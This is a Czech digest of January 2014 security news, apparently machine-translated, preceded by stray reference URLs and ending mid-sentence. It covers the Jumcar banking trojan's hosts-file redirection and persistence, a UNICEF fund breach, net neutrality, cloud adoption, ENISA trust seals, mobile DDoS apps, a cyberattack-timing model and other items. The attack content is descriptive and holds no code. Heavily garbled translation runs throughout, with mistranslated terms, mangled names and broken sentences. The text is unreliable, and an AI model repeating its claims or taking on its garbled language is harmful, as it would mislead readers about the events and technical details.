[1] http://www.telegraph.co.uk/technology/9136029/How-spies-used-Facebook-to-steal-Nato-chiefs-details.html
[2] http://pen-testing.sans.org/blog/pen-testing/2011/11/04/the-pushpin-tool-incorporating-geolocation-info-leakage-via-social-networks-in-your-pen-tests
[3] http://lynx.browser.org/
[4] http://washingtonnote.com/john-bolton-reaches-email-beware/
[5] https://help.linkedin.com/app/safety/answers/detail/a_id/146
Z Latinské Ameriky s láskou, Jumcar udeří znovu
24.1.2014 Viry
Nový vzorek byl předložen k Virus Total systému 18. ledna ročníku , který byl rychle spatřen můj kolega Dmitrij Bestuzhev . Zajímavé je, zdá se, že nová varianta Jumcar malware rodině se objevil a mnoho změn, které byly provedeny na původní zdrojový kód. Protože se jedná Latinské Ameriky na zakázku malware existuje spousta řetězců písemných ve španělštině, některé z nich, které nebudeme zmiňovat, protože oni jsou chtěl urazit bezpečnostních výzkumníků, zatímco oni zkontrolujte kód.
Oni První věc, která upoutala naši pozornost byla přítomnost nějaké informace o ladění stále k dispozici v spustitelného souboru. Po velmi základní analýzu jsme potvrdili, že jsme se zabývali NET aplikací společnosti Microsoft. A řetězce jsme našli byla původní cesta, kde byl škodlivý práce je laděn do systému developera. Zřejmě "Victor" testoval svou novou tvorbu proti několika antivirových jader, protože vzorek byl předložen sám na Virus Total.
V přestrojení za nevinného "Facebook" aplikace, Jumcar láká uživatele na poklepáním na soubor infikovat systém a doručit nebezpečný náklad.
Zdá se, že docela nevinný, že jo?
Po spustitelný byl zahájen, bude to vypadat jako "Facebook" nástroj v procesu monitoru a zároveň se začne provádět některé zkoušky s připojením k síti, zda je možné stáhnout druhou etapu škodlivého kódu. V tomto případě se kontroluje pomocí Google (pomocí jak název domény a IP adresy), aby zjistili, zda je k dispozici připojení k internetu a stáhne další soubor potřebný pro infekci.
Pokud vše půjde tak, jak se očekávalo, bude Jumcar snažit získat textový soubor ze serveru umístěného v Chile, který obsahuje název banky, že se pokusí ukrást informace z. Tento seznam je také vhodně přejmenován jako "robots.txt" standardní vyloučení souboru tak, aby správcům IT nevšimne nic neobvyklého při kontrole své záznamy protokolu.
S tímto seznamem stažené, následující krok je použít k přepsání Windows hostí informaci umístěnou v% systemroot% \ system32 \ drivers \ etc \. Takže teď, pokaždé, když se uživatel pokusí o přístup k některé z oblastí uvedených v seznamu škodlivých hosts, že bude přesměrován na jinou IP a prezentovány s falešnou verzi požadované webové stránky místo. V současné době je tato IP je offline, ale protože soubor je načten dynamicky malware to lze snadno změnit výměnou soubor "robots.txt".
V předchozích verzích Jumcar, že cíle byly bankovní instituce, především z Peru. V této variantě, kód byl upraven tak, aby napadnout bolivijské banky, ale tam je nic zastavit malware tvůrci z rozšíření tohoto seznamu. To dává smysl, protože název shromáždění NET spustitelný soubor. byl "newbol", což by mohlo naznačovat nový bolivijský varianta.
Mnoho kryptografických funkcí jsou používány v rámci kódu ( nic nového, protože předchozí verze spoléhal se těžko na crypto ) přidat vrstvu mlžení a zmařit úsilí analýzy. Naštěstí kontrolora síťový provoz a demontáž. NET zdrojový kód jsme schopni získat nahlédnout, jak bylo provedeno vnitřní vývoj této hrozby. Tato nejnovější verze obsahuje řadu vestavěných řetězců, které se dešifrovat pomocí metody zvané GenerateRSAreverse (), přičemž každý řetězec a vytváří jasnou textovou verzi, která bude použita pro různé úkoly malware.
Například z následující části RSA šifrovaného textu, Jumcar získá název souboru pro vytrvalost (pomocí "winlogon.exe" v klíči registru CurrentVersion \ Run), IP adresu serveru, kde je potřebuje k získání "robots.txt" soubor a další.
Hlavní Logika této hrozby je stále poměrně jednoduchá a opírá se o rychle infikování systému a nahrazení souboru hosts, aby odcizení dat. I když to není velmi sofistikované, že se zdá být velmi efektivní a umožňuje útočníkům provést změny kódu rychle vytvářet nové varianty na vyžádání.
Není to velmi časté najít malware vyvinut v Latinské Americe, nebo pomocí NET technologii.. Nicméně v posledních měsících jsme byli svědky, že výhody rychlého vývoje kódu a rámcové použití jsou lákavé dost přesvědčit zločinci, aby přijaly vývoj software osvědčené postupy. S Ploutus , malware Bankomat také vytvořeny od nuly v regionu. NET se zdá, že španělsky mluvící malware svět je jen asi zajímavé. Pro tuto chvíli, to se zdá být jen pokus o malware tvůrce otestovat ceny detekce, ale budeme muset držet oči otevřené, protože skutečná hrozba může objevit v každém okamžiku. Od Latinské Ameriky s láskou , Jumcar je zde opět .
Kaspersky Anti-Virus detekuje všechny uvedené vzorky heuristickou analýzou jako Trojan.Win32.Fsysna varianty.
Uživatel finanční informace ohrožena v americkém fondu UNICEF porušení
24.1.2014 Hacking
Americký fond pro UNICEF, nezisková nevládní organizace se sídlem v New Yorku, oznámil Úřad New Hampshire generálního prokurátora, že utrpěl porušení v listopadu 2013. Podle dopisu , na 02.12.2013 oni objevili, že neoprávněné osoby mají přístup k jedné ze svých serverů nebo na 4. listopadu. "Po objevu, americký fond okamžitě vypnuli postižený server a odpojení od sítě US fondu," oni říkají , s tím, že mají okamžitě zahájila vyšetřování ve věci , a najal nezávislé třetí strany, počítačové forenzní firma jim pomoci při vyšetřování a pomoci jim zjistit totožnost osob, jejichž údaje mohou být vystaveny. Zjistili, že útok byl omezen na jeden server, a to jména, telefonní čísla, info o platebních kartách (i bezpečnostní kód a datum vypršení platnosti), a bankovní účet info ze tří obyvatel New Hampshire byly ohroženy. Dotčené osoby byly oceněny situace a byly poskytnuty s volným rok úvěrového monitoringu a obnovy identity služby s allCLEAR ID, stejně jako informace o tom, jak se chránit před podvody a krádežemi identity. organizace nesdílel celkový počet fyzických osob, jejichž údaje byly ohrožena New Hampshire generálního prokurátora, ale soudě podle obsahu oznámení mají připojené k dopisu, Severní Karolína a Maryland obyvatelé byli také ovlivněna porušením. Oni také nezapomeňte na vědomí, že doposud se jim podařilo nalézt žádné důkazy o pokusu nebo skutečného zneužití ohrožení informací.
Americká federální soud pro ránu neutralitě
24.1.2014 IT
S výrokem 3-k-0, soudci amerického odvolacího soudu pro District of Columbia Circuit se rozhodli udeřit dolů Federal Communications Komise Spusťte aplikaci Internet řád, a se zabýval vážnou ránu do čisté neutrality. Net neutrality - zásada, že poskytovatelé internetových služeb a vlády by měly jednat veškerý internetový provoz stejné bez ohledu na zdroj - a otevřený internet teď mohl stát minulostí, pokud FCC netvrdí, je orgán a překvalifikovat poskytovatelé širokopásmového připojení jako poskytovatelé telekomunikačních služeb "," a ne jako poskytovatelé "informačních služeb". Podle soudců, kteří se rozhodli vyhovět výzvě v čele s Verizon, části otevřené internetové objednávky se uvolní, protože již v roce 2010, kdy byla založena, FCC neměl pravomoc vydávat pravidla a léčbě poskytovatelé širokopásmového připojení jako běžné nosiče (druhá byla, že vědomí, že porušení zákona o komunikacích z roku 1996). Proto, anti-diskriminaci a anti-blokovací pravidla bude zrušeno, ale pravidla zveřejňování zůstane. To znamená, že poskytovatelé širokopásmového připojení - fixní i mobilní - ". zveřejnit přesné informace týkající se postupů řízení sítě, provozování a obchodních podmínek [jejich] služby vysokorychlostního přístupu k internetu", mají stále povinnost se však oba typy poskytovatelé širokopásmového připojení již nejsou zakázáno "bloku [ing] zákonný obsah, aplikace, služby, nebo non-škodlivé zařízení" nebo "block [ing] aplikacích, které soutěží s hlasovými nebo videa telefonních služeb poskytovatele." a pevné poskytovatelé širokopásmového připojení not již zakázáno. "nepřiměřeně diskriminující při předávání zákonným síťový provoz over Širokopásmový přístup k internetu útvarem spotřebitele" (. Mobilní poskytovatelé nebyli vázáni tohoto pravidla v první řadě), "Toto rozhodnutí znamená, že společnosti jako AT & T, Comcast a Verizon - které přinesl soud - jsou nyní zdarma blokovat nebo zpomalit jakékoliv webové stránky, aplikace nebo služba se jim líbí, "uvedl Craig Aaron, svobodný tisk" současný prezident a generální ředitel společnosti. "Tyto společnosti budou spěchat změnit web a linku své kapsy u našich náklady -. vytvoření nové mýtné pro app tvůrci, drahé cenových úrovní na populárních míst a rychlých pruzích otevřené jen na několik poskytovatelů obsahu, který jim může dovolit " Ale boj ještě není ztracen předseda FCC Tom Wheeler mohou rozhodnout, zda se bude líbit. rozhodnutí soudců, a nakonec předložit otázku k rozhodnutí před Nejvyšším soudem USA. zůstává otázka, zda FCC bude mít tuto cestu.
Bezpečnostní obavy jsou stále brzdí cloud přijetí
24.1.2014 Bezpečnost
Existují významné rozdíly v obav o veřejné cloudové infrastruktury mezi cloud-moudrý, organizací, které se v současnosti používají cloudové služby, a cloud opatrný, organizací, které nejsou pomocí cloudových služeb a nemají téměř dlouhodobé plány, aby tak učinily.
Nový průzkum vrhá světlo na nové výzvy pro organizace, protože působí rychle, velké datových aplikací v cloudu a odhaluje mylná představa, že vizualizace je požadovaná charakteristika veřejných cloudů. Internap dotázaných téměř 250 rozhodovací pravomocí Internet infrastruktury na celém světě získat vhled do veřejné cloud adopce, požadavky a výzvy. Respondenti pokryla celou řadu průmyslových odvětví, včetně softwaru a internetu, hosting a IT infrastrukturu, média a zábavu, hraní her, zdravotní péče, vzdělání a finanční služby. průzkumu zahrnuty respondenti ze Severní Ameriky, EMEA, APAC a Latinské Ameriky, kteří pracují pro firmy, které se pohybují z více než 10 miliard dolarů méně než 1 milión dolarů v příjmech. Klíčová zjištění:
Většina cloud opatrný (40%), citovaný cloud zabezpečení jako problém, zatímco pouze 15% z cloud-moudrý citované zabezpečení jako výzvu, že jsem se setkal.
Horní oblačnosti problémy, s nimiž se cloud-moudrý organizací byly výkon (30%) a náklady na měřítku (28%), následuje spolehlivosti (22%), dodržování (16%), bezpečnost (15%) a omezené konfigurace (15% ).
59% respondentů hosting velké datové aplikace v cloudu citované výkonnostní problémy.
66% respondentů uvádělo virtualizaci jako určující charakteristika veřejného cloudu, i když veřejné mraky nepotřebují virtualizaci.
63% respondentů uvedlo, bare-metal mrak by se apelovat na ně. Většina z nich (73%), citoval "vyšší výkon dedikovaných serverů" jako důvod, a 35% uvedlo, že by raději bare-metal mrak nad virtuální mrak.
Cloud-opatrný, může nadhodnocovat bezpečnostní rizika cloud, cloud-moudrý tvář nové bolest bodů
Cloud-moudrý a cloud-opatrný organizace vyjádřili různé obavy veřejnosti cloudových služeb. Zatímco většina cloud opatrný organizací citoval bezpečnostní obavy z toho důvodu, že se drží zpátky od používání cloud služeb, cloud-moudrý ukázal na výkonu a nákladů na měřítku jako top výzvy, s nimiž se setkávají s jejich aktuální veřejné cloudové služby. Cloud- Moudří organizace zařadil bezpečnostní výzvy vzdálený pětinu. Zatímco část rizik zabezpečení cloud opatrný jsou z bezpečnostních vědomé odvětvích, jako jsou finanční služby, zdravotnictví a vlády, většina může být přeceňování od výkonu a nákladů na vrcholu seznamu skutečných problémů, s nimiž se setkávají cloud-moudrý. Fast, velké datové aplikace se vyvíjejí tlak na veřejné virtuálních mraky Nová generace datově náročné aplikace, které vyžadují vysokou rychlost a ultra-nízkou latenci internetovou infrastrukturu s cílem zajistit obrovské množství nepřetržité přijímání dat v reálném čase analýzu a nákladové efektivnosti v měřítku se překonal schopnosti tradičních virtualizovaných veřejných cloudů. Virtualizace - spolu s zpracování režie its hypervisor jednovrstvé i rozpočtovým omezením, které vyplývají ze sdíleného hardware -. Může vytvořit významné výkonu daňovém uplatnění "Údaje z průzkumu jasně vyplývá, že velké datové aplikace - jako jsou ty, které umožňují individuální nastavení a cílení prostřednictvím podpory zákazníků postřehy, sociální analýzy a mapování umístění - tlačí na výkonnostní limity virtuálních veřejných cloudových prostředích v cenových bodů, které nedávají smysl pro obchod, "řekl Gopala Tumuluri, viceprezident hostovaných služeb na Internap. "Výkon a cena jsou hlavní kritéria pro výběr organizací, kteří se rozhodnou veřejné poskytovatele cloud. Přesto, ironicky, horní výzvy organizace i nadále čelit jejich stávajících veřejných cloudových služeb jsou výkon a cena-příbuzný. " Organizace mylně ztotožňují virtualizaci s veřejnou cloudu Průzkum také upozorňuje na všudypřítomnost na "cloud rovná virtualizace" mýtu. Na rozdíl od všeobecného přesvědčení, veřejný cloud není synonymem virtualizace. Ve skutečnosti, podle Národního institutu pro standardy a technologie (NIST), virtualizace není charakteristickým rysem veřejného cloudu. Tato rozšířená mylná představa představuje příležitost k rozšíření dnešní úzkou definici veřejného cloudu a budovat větší povědomí o jiných forem on-demand, elastické výpočetně nabídky, jako je například holém cloudu, které často poskytují vynikající výkon a cenové alternativy. Změna aplikační požadavky jsou řidičský zájem o jiné formy veřejných cloud organizací s scale-out, aplikace výkon citlivé byli některá ta nejprve přijmout holých veřejné cloudy, které kombinují rychlost a spolehlivost specializovaných, single-nájemce servery s agility, já služby a flexibilní přístup k vyúčtování virtualizovaných, multi-nájemní veřejného cloudu nabídky. Téměř dvě třetiny (63%) respondentů uvedlo, bare-metal mrak by se apelovat na ně.
Kdy můžete věřit webové služby pro zpracování dat?
24.1.2014 IT | Bezpečnost
Nová zpráva o kybernetické bezpečnosti agentury EU ENISA analyzuje podmínky, za kterých on-line bezpečnosti a soukromí těsnění pomohou uživatelům posoudit důvěryhodnost webové služby. Zpráva zdůrazňuje potřebu jasného metodiky ikony, normy, posuzování a hodnocení. Navíc, druhá zpráva se zabývá rámec, metodika a hodnocení pro bezpečnostní certifikace a poskytuje kvalitativní analýzu certifikačních postupů v EU. Řada politických dokumentů, identifikaci značky, těsnění , loga, ikony (souhrnně označované jako "těsnění"). Tito uživatelé pomáhají posoudit důvěryhodnost nabízených služeb na internetu. Ale existuje mnoho překážek pro uživatele používat tyto pečetě, protože není jasné, jak jsou závěry poskytnuté služby. ENISA analyzuje současnou situaci a identifikuje klíčové problémy, řešení a doporučení pro on-line těsnění. Tyto dvě zprávy se zabývají (1), jak mohou uživatelé používat těsnění založit jejich důvěru ve služby, a (2) co se můžeme učit od jiných certifikačních iniciativy zaměřené na zlepšení těchto těsnění. Některé z klíčových výzev a odpovídající doporučení jsou: Uživatelé trpí zahlcení informacemi. Proto, webové designéry je třeba vyvinout jasnější ikony o ochraně osobních údajů, které jsou založeny na výzkumu, včetně kulturních a právních rozdílů. Uživatelé nejsou dostatečně vědomi toho, co těsnění na mysli. Vzdělávací Materiál by měl být poskytnuty za účelem šíření znalostí o existenci a významu těsnění. Těsnění nejsou kontrolovány uživatelem. Poskytovatelé služeb a weboví vývojáři potřebují zajistit a realizovat těsnění, které mohou být automaticky kontrolovány. Průhlednost. Tvůrci politik by měli požadovat spolehlivé statistiky o certifikaci a těsnění. Orgány vydávající osvědčení / plomby by měly vést aktualizované, veřejné záznamy o osvědčeních / těsnění, které vydaly. Snížení zátěže. normalizačních orgánů a odpovědných zúčastněné strany by měly rozvíjet osvědčené postupy a normy spojující požadavky na bezpečnost a ochranu údajů, aby se snížila zátěž. . Vymáhání Národní tvůrci politik by měl zajistit dodržování těchto požadavků na řádné dodržování, například tím, že uplatňování sankcí a / nebo hodnocení ad-hoc prováděných třetími osobami. Výkonný ředitel agentury ENISA, profesor Udo Helmbrecht poznamenal: "Účinnost důvěry signály musí být zlepšena. Regulační orgány na úrovni EU a na vnitrostátní úrovni by měl stanovit pobídky pro poskytovatele služeb, aby získal lepší on-line bezpečnosti a soukromí ochrana ".
Mobilní aplikace jsou používány k útokům DDoS
24.1.2014 Počítačový útok | Mobil
Prolexic Technologies oznámila, že mobilní aplikace jsou používány v DDoS útoků proti firemní zákazníky.
"Prevalence mobilních zařízení a rozšířená dostupnost stahovatelných aplikací, které mohou být použity pro DDoS je hra měnič," řekl Stuart Scholly, prezident Prolexic. "Škodlivé herci nyní nesou silný útok nástroj do dlaně svých rukou, což vyžaduje minimální dovednosti používat. Protože je to tak snadné pro uživatele mobilních zařízení k opt-in DDoS útok kampaní očekáváme značný nárůst v používání těchto útočných nástrojů v roce 2014. " získaných dat ve 4. čtvrtletí z útoků proti globální klientskou základnu Prolexic ukazuje, že mobilní zařízení se zúčastnil DDoS útok kampaně proti globální finanční služby firmy. Digitální forenzní a analýza útok podpis zjištěna použití AnDOSid, se systémem Android nástroje operačního systému, který provádí HTTP POST povodňové útok. "Mobilní zařízení přidat další vrstvu komplexnosti," vysvětlil Scholly. "Vzhledem k tomu, mobilní sítě používat super proxy, nelze jednoduše použít hardwarové zařízení k blokování zdroj IP adresy, jak to bude také blokovat legitimní provoz. Účinné zmírnění DDoS vyžaduje další úroveň snímání otisků prstů a lidské odborných znalostí, aby speciální blokující podpisy mohou být vyvinuty on-the-fly a aplikovat v reálném čase. " Prolexic věří, že vývojáři aplikací běžně používaných v DDoS útoků, jako je Low Orbit Ion Canon (LOIC ) bude stále více portů, aby mobilní platformy v roce 2014. "Tradičně bylo zapotřebí nějaký druh infekce nebo malware," řekl Scholly. "V případě mobilních aplikací, škodlivé subjekty mohou vybrat aktivně účastnit organizovaných DDoS útoku kampaní. Když si uvědomíte, kolik uživatelů mobilních telefonů zařízení existují ve světě, to představuje významnou DDoS hrozbu. " Největší DDoS útoku Prolexic zmírněna ve 4. čtvrtletí dosáhla vrcholu 179 Gb, což je největší DDoS útoku společnost čelila k dnešnímu dni. Velikosti útoku i nadále růst a v tomto čtvrtletí, Prolexic zmírnit několik útoků přes 100 Gbps. Stejně jako v předchozích čtvrtletích, škodlivé herci i nadále upřednostňovat spuštění Layer 3 a vrstvy 4 útoky na prvky infrastruktury. Útoky infrastruktury tvořily 76,76 procenta z celkových útoků během čtvrtletí s aplikační vrstvy útoků tvořících zbývajících 23,24 procenta. UDP (13.15 procenta), fragment UDP (17,11 procenta), DNS (9,58 procenta), SYN (14,56 procenta) a HTTP GET (19,91 procenta) povodně byly nejčastější typy útoků namířených proti klientům Prolexic. Protokol chargen, běžně používaný v reflexních útoků zvýšil 92,31 procenta v tomto čtvrtletí, což dokládá rostoucí popularitu tohoto typu útoku.
Rovnice určuje optimální okamžik pro kybernetický útok
23.1.2014 Bezpečnost
Dva vědci vyvinuli matematický model pro zjištění optimální okamžik pro nasazení specifické kybernetické zbraně ve svém arzenálu.
Ve výzkumné zprávě nedávno zveřejněné podle Proceedings of the National Academy of Sciences (PNAS), profesor politologie a veřejné politiky na Michiganské univerzitě Robert Axelrod a postgraduální výzkumný pracovník bachoru Iliev popsal rovnice, které vytvořili a co to trvá do úvaha:
Zbraň je stealth, tj. pravděpodobnost, že pokud budete používat teď to nebude detekován a bude i nadále použitelné v dalším časovém období
Zbraň je vytrvalost, tj. pravděpodobnost, že pokud se ji používat hned, bude to ještě být použitelná v příštím období
Hodnota zbraně, která je přímo vázána s stealth a vytrvalosti
Na současný a pravděpodobný budoucí sázky
Práh sázky, které způsobí, že budete používat zbraň
Diskontní sazba - odraz skutečnosti, že daná odměna je nižší o rok později, než je tomu dnes.
"Oba stealth a vytrvalost závisí nejen na samotném zdroji, ale také na schopnosti a ostražitosti zamýšleného cíle," vysvětlili. "Stealth z prostředku používaného proti dobře chráněné cíle, je pravděpodobné, že bude menší než stealth téhož prostředku proti cíli, který není příliš bezpečnostní svědomitě. Stejně tak se zdrojem typicky mají menší vytrvalost proti cíli, který vedl to-aktuální informace o bezpečnostní záplaty, než ten, který nemá. " rovnice ukazuje počet (celkem zřejmých věcí). Pro jednoho, více kradmý zbraň, tím lepší je používat spíše dříve než později. . Za druhé, odolnější zbraň, již jeho použití může být odložena Vědci zkouší svůj model na poslední útoky - Stuxnet, íránský útok na Saudi Aramco, a vaše zahrada-odrůda, každý den Čínská kybernetické špionáže - a ukázala pravda , tvrdí. Stuxnet worm měl malou vytrvalost, protože používá čtyři různé zero-day využije, a to bylo navrhnuto být velmi nenápadný. V sázce byly vysoké:. To bylo lepší odložit schopnosti Íránu dosáhnout dostatek obohaceného uranu pro jaderné zbraně, které hodit klíče do svých plánů později "Náš model předpovídá, že zdroj, jako Stuxnet, který byl čekal, že mají špatnou vytrvalost a poměrně dobrou stealth by použít co nejdříve, a rozhodně v situaci, high-stakes. To je zřejmě jen to, co se stalo, "poukázali. Ve Saudi Aramco v případě, že zbraň byla použita není nenápadný, ale v sázce byla vysoká dost ospravedlnit rychlé jednání , který byl, opět, co se stalo. Na druhou stranu, čínské kybernetické špionáže kampaně se obvykle provádí v optimální chvíli, ale je to těžké říct, proč. "Druhé hádat výběr národ je vždy problematické," poznamenal vědci. "Tento dokument vyjasnit některé z důležitých faktorů, které by měly být brány v úvahu při každém rozhodnutí použít metodu využívající cílového zranitelnost. důraz byl kladen na optimální načasování pro takové použití, "že vědci sdílené. "Tento druh analýzy může pomoci uživatelům lépe se rozhodovat a pomoci obránci lépe pochopit, co jsou proti. V některých situacích, jeden může chtít zmírnit potenciální škody z kybernetického konfliktu, a v jiné situace, jeden může chtít využít nástroje Cyber konfliktu. V některých případech, jeden by mohl chtít udělat obojí. V každém případě, důležitým krokem je pochopit logiku vlastní v této nové oblasti.
Pochopení mobilní body bezpečnostní tlakové a zranitelnosti
23.1.2014 Mobil
41 procent státních zaměstnanců, kteří používají nástroje pro hodnocení jsou uvedení sebe a své kanceláře v ohrožení s existujícími zvyky mobilních zařízení, podle zprávy Mobile Work Exchange.
Zpráva uvádí, že 90 procent respondentů státních zaměstnanců použít alespoň jeden mobilní zařízení - notebook, smartphone, a / nebo tablety - pro pracovní účely. Mnoho vládních respondentů užíváte základní kroky k zabezpečení dat agentur. Osmdesát šest procent zamknout svůj počítač, když od svého stolu,. Navíc, 86 procent jsou bezpečné a alternativní pracoviště kompatibilní pro práci, a 78 procent vždy ukládat soubory na bezpečném místě Navzdory těmto bezpečných kroků, státní zaměstnanci nejsou zobrazeny stejné upozornění pro mobilní zařízení. Jsou cvičit potenciálně nebezpečné chování, včetně používání veřejné Wi-Fi připojení na internet (31 procent), nedostatek Multifaktorová autentizace nebo šifrování dat (52 procent), a neschopnost používat hesla na mobilní zařízení pro práci (25 procent). I když Zaměstnanci použijete heslo, téměř jeden ze tří přiznává, že pomocí "easy" heslo a šest procent těch, kteří přiznávají, že je to napsáno. Pokud příslušné zásady a postupy zabezpečení jsou na místě a prosazována, mobilní pracovní síla může být obrovská přínosem pro vládní agentury. Nicméně, 57 procent respondentů, kteří se hodnocení z agentury / pohledu celého podniku se nedaří zabezpečit data agentur, s mezerami v mobilních politik a bezpečnostních systémů. Přes Spolkové digitální strategii vlády, více než jeden ze čtyř státní zaměstnanci nejsou obdržel mobilní školení bezpečnosti ze svých kanceláří. Navíc, jen 50 procent respondentů poznamenal, že jejich agentury mají formální, programy pro zaměstnance zaměřený na mobilní zařízení. Polovina z agentur, které se v hodnocení chybí základní mobilní bezpečnostní opatření, jako je využití vzdáleného vymazání funkci, nebo přidáním Multifaktorová autentizace nebo šifrování dat na mobilních zařízeních. "V blízké budoucnosti, bude počet mobilních zařízení vyšší než světové populace, a do roku 2017 očekáváme, že více než 10 miliard připojených mobilních zařízení, "řekl Larry Payne, viceprezident společnosti Cisco, US Federal. "S rozšířením zařízení, zabezpečení i nadále velkým problémem. 2014 Mobilometer Tracker studie ukazuje, že šest procent státních zaměstnanců, kteří používají mobilní zařízení pro práci říkají, že jste ztratili nebo ztratil svůj telefon. V průměru Federální agentura, která je více než 3500 šance pro porušení bezpečnosti. Organizace musí přijmout nezbytná opatření k ochraně svých dat a minimalizují riziko ztráty dat. " I přes nedostatky, vládní respondentů zaznamenal výrazně bezpečnější na Secure Mobilometer než jejich protějšky v soukromém sektoru. Co soukromého sektoru naučit?
Poznej své pracovní síly: 97 procent vládních respondentů, kteří na dálku říkají, že mají formální dohodu o práci na dálku v místě, ve srovnání s pouze 56 procent respondentů v soukromém sektoru
Znát svá zařízení: 53 procent z vládních agentur požadují zaměstnanci registrovat mobilních zařízení s oddělením IT ve srovnání s pouze 21 procent organizací, soukromého sektoru
Vyžadovat školení: 53 procent z vládních agentur vyžadovat, aby všichni zaměstnanci, aby se pravidelné bezpečnostní školení týkající se mobilních zařízení ve srovnání s pouze 13 procent organizací, soukromého sektoru
Minimalizace rizika: ve světě, kde musí vedoucí IT podpora soukromého zařízení uživatelů, bezpečnost se stává nejdůležitější, a 15 procent státních respondentů si stáhli aplikaci non-práce související na mobilní zařízení, které používáte pro práci ve srovnání s 60 procent soukromého sektoru respondentů.
Top 7 obavy o bezpečnost na rok 2014
23.1.2014 Bezpečnost
AhnLab oznámila své "Top 7 důvodů zabezpečení 2014". Vzhledem k tomu, AhnLab se ponoří do kybernetických zákopech a oblaku, jeho tým je velmi zkušený sledování trendů a vedení v evidenci o tom, co je vyvíjen zločinci po celém světě. 1. Malware cílení koncoví uživatelé budou růst sofistikovanější, stejně jako ty používané v APT typu útoků apts (Advanced Persistent hrozby) a dalších pokročilých cílených útoků, dodávají obrovské škody na celém světě. Poslední útok byl krádež informací o účtu z 70 milionů cílové zákazníky v USA na konci roku 2013. V roce 2014, malware zaměřený na koncové uživatele bude ještě složitější, jako ty používané v APT útoků. Jinými slovy, bude advanced hrozby (malware) cíle nejen organizací, ale jednotliví uživatelé. OnlineGameHack, který je navržen tak, aby krást on-line herních účtů, je na cestě k bytí transformované bankovní malware, který krade banking pověření. Apt-typy hrozeb se příliš neliší od zalévání děr útoků, který využívá zero-day zranitelnost. Kromě toho bude počet Bitcoin těžby malware útoky zvyšují. 2. Hardware-based distribuce malware zvýší Firmware je kombinace trvalé paměti a programového kódu a dat uložených v hardwarových zařízení. V roce 2014, se počítačoví zločinci urychlit jejich šíření malwaru prostřednictvím hardwaru, včetně firmware, aby se zabránilo odhalení. V dubnu 2013 BIOS zdrojový kód byl propuštěn od dodavatele. backdoor v konkrétním firmware byl nalezen v říjnu. Ve výskytu cizinec, v listopadu, některé žehličky dovezené z Číny do Ruska údajně prokázala, včetně bezdrátových špionážní čipy, které by se připojují k nechráněné sítě Wi-Fi a šíření virů. 3. Zrychlení industrializace on-line bankovních podvodů a počítačové kriminality počítačové kriminalitě bude i nadále růst jako podnikání. V roce 2013, tam bylo mnoho typů on-line bankovních podvodů, včetně (hlas) phishing, pharming, SMiShingových (SMS + phishing) a modifikaci paměti. Odborníci poukazují na to, že bankovní malware se stává stále důmyslnější. Očekáváme, že malware autoři budou i nadále zaměřovat na finanční sektor. Kromě bankovnictví je primární cíl, bude vláda, telekomunikace a výroba i nadále vysoko na seznamu. 4. Útočníci se najít jednodušší způsob, jak distribuovat malware v roce 2014, budou útočníci využívat ještě více nákladově efektivní způsob, jak distribuovat malware. Již se počítačoví zločinci pronajmout botnetů k šíření malware, spíše než rozvíjet jejich vlastní. Předpokládáme, že, například, bude se snažit dělat kompromisy poskytovatelům CDN, poskytovatele domény a / nebo poskytovatelé internetových služeb, takže uživatelé mohou snadno nakazit při návštěvě webové stránky spojené s poruchou obsah z internetových služeb. 5. Zvýšená pravděpodobnost výskytu malware, jako Microsoft ukončí podporu Windows XP Podpora pro systém Windows XP SP3 a Office 2003 skončí 8. dubna 2014. To znamená, že uživatelé již nebudou mít bezpečnostní aktualizace (patche) pro systém Windows XP od společnosti Microsoft. Je zřejmé, že útočníci budou využívat bezpečnostní nedostatky XP a IE 6 až 8, protože mnoho uživatelů PC jsou jim stále používá. Domácí uživatelé budou muset spoléhat na antivirus, internetové bezpečnosti, firewally a další bezpečnostní třetí-party řešení. Uživatelé domácí i firemní desktop budou muset aktualizovat svůj operační systém. Také, uživatelé Mac nejsou imunní vůči útokům! 6. Cílená mobilní škodlivý aplikace se objeví v našem výzkumu, škodlivé aplikace se zaměřením na OS Android se stále více podobá PC malware z hlediska objemu a zaměření. Jako PC malware před počítačovými zločinci jde nižší objem, ale vysoce cílené, android škodlivé aplikace budou mít stejnou kontrolu. To je proto, aby se snížilo riziko odhalení, bude mít za cíl útočníků své útoky na mobilní zařízení klíčových osob a fyzických osob v podnicích, společnostech a ve vládě, spíše než masový trh. Jejich poškození může být ještě větší. Tam jsou hlavní rizika BYOD! 7. Kybernetická válka bude viditelnější a intenzivní Neříkáme, že kybernetická válka tam předtím nebyl Edward Snowden odhalil utajované dokumenty NSA. Jeho akce bude mít za následek kybernetická válka stále více oblastí zájmu a za nejvyšší prioritu ve vnitrostátní a mezinárodní bezpečnosti.
Důvěřuj, ale prověřuj: Mozilla execs vyzve výzkumné pracovníky, aby audit jejich kód
23.1.2014 Špionáž | Bezpečnost
Nedávné odhalení o úsilí NSA dozoru, a zejména na tvrzení, že agentura byla přesvědčování nebo nutí vývojáře softwaru, aby se zadní vrátka do svých nabídek, a který jim zabránila veřejně mluvit o tom, zanechal mnoho uživatelů přemýšlel, jak si mohou být jisti, že software, který plánujete použít nebudou použity proti nim. Podle Mozilla CTO Brendan Eich a VP mobilní a R & D Andreas Gal, řešením je používat open-source software, jehož zdrojový kód a byl posouzen nezávislými bezpečnostními experty. "Každá hlavní dnes prohlížeč je distribuován prostřednictvím organizace v dosahu zákonů dozoru. Jak Lavabit případ naznačuje, že vláda může požadovat, aby dodavatelé prohlížeče tajně injekci dohledu kód do prohlížečů, které distribuují uživatelům", že poukázal na svém blogu, ale dodal, že oni "nemají informace, že každý prodejce prohlížeč má někdy obdržel takovou směrnici." Oni, samozřejmě, vnucuje společnosti prohlížeč Firefox jako nejlepší volba, vzhledem k tomu, že IE je zcela a Safari a Chrome částečně, na základě uzavřené-source kód. Také každý, kdo ví, jak na to může ověřit, že zdrojový kód Firefoxu nebylo manipulováno s tím, že staví Firefox od zdroje a porovnávání postavené kousky s oficiální distribuce. Mají pak pozvala a vyzvala výzkumníky bezpečnosti a organizace pro audit Mozilla source a ověřeny staví na pravidelném základě, a vyvinout automatizované systémy, které lze ověřit oficiální Mozilly od zdroje, takže záznam může být zvýšen co nejdříve, pokud se neshodují. bude společnost také vytvořit takové ověření systém, a bude žádat lidi z celého světa k účasti. Ale, jak sami říkají, "dodavatelé softwaru - včetně dodavatelů v prohlížeči - nesmí být slepě věřit," a proto požádat nezávislé výzkumníky bezpečnosti, jak to udělat také. Nakonec se zvýšila možnost auditovaných prohlížečů stává "důvěra kotvy" moci ověřit plně auditovanou open-source internetové služby, a zeptal se lidí, kteří se pokusili udělat něco podobného, aby se podělili o své 